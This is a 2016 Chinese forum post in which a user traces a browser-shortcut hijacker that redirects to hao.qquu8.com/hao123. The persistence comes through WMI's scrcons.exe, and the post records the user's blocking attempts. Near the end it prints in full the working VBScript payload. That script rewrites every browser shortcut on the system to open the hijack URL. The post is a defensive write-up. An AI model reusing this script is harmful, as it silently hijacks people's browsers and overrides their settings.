本帖最后由 swaggerz 于 2016-7-6 17:48 编辑
所有的浏览器快捷方式都被加上了这个网站,然后跳转到hao123,很长时间都不想管,以为是小问题,昨天想改回来却发现不容易改回来。
网上的方法都试过了,
在注册表里搜索qquu8、hao123,全部删除,无效
查看可疑的进程,由于这个快捷方式是隔一段时间才被修改的,至少间隔20分钟以上,我也没耐心去监控
windows目录下也没有OEM8, 也没有kms10
driver目录下也没有Mslmedia.sys
最后仔细排查,发现有一个haStdnetfilter.sys文件,通过查询,才确定了是这个
https://www.virustotal.com/en/fi ... nalysis/1466926439/
删除后解决
这个帖子是给其他有同样问题的朋友的,因为google前几页都没有解决问题,用haStdnetfilter.sys搜索只发现了这个链接有点用,http://blog.sina.com.cn/s/blog_4ce2ff1e0102wjvo.html
haStdnetfilter.sys应该HTTP Analyzer的驱动,之前弄错了
2016-6-28:
更新一下,按上述方式,当时观察了至少半天的时间,没有被改回去,以为好了。
目前是修改快捷方式的时间间隔延长了,但还是会被修改。给我的感觉是修改的时间不定,用process monitor观察了2个小时,也没见到被修改,有时没一会又被改
昨天安装了火绒,添加了一条规则,禁止任意程序修改和创建桌面图标快捷方式,还是会被改,但只会被修改一个。
日志显示:
操作进程:C:\Windows\System32\wbem\scrcons.exe
风险动作:修改桌面快捷方式(后台创建)
目标文件:C:\Users\s\Desktop\S - Chrome.lnk
用户操作:已阻止
查看scrcons.exe无危险
又加一条规则:禁止任意程序执行scrcons.exe,不知道这样行不行
再次更新,是svchost.exe调用的
操作进程:C:\windows\system32\svchost.exe
触犯规则:Group1
操作类型:执行
C:\windows\system32\wbem\scrcons.exe
用户操作:已阻止
再如何?
2016-7-5
按http://blog.sina.com.cn/s/blog_8be14f360102vyrc.html暂时找到一个
On Error Resume Next:Const link = "http://hao.qquu8.com/?m=yx&r=x":Const link360 = "http://hao.qquu8.com/?m=yx&r=x&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\s\Desktop,C:\Users\s\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\s\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\s\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
2016-7-6
今天一天都未出现被修改情况,暂时应该没问题了 |
发表于 2016-6-26 15:36:26
楼主
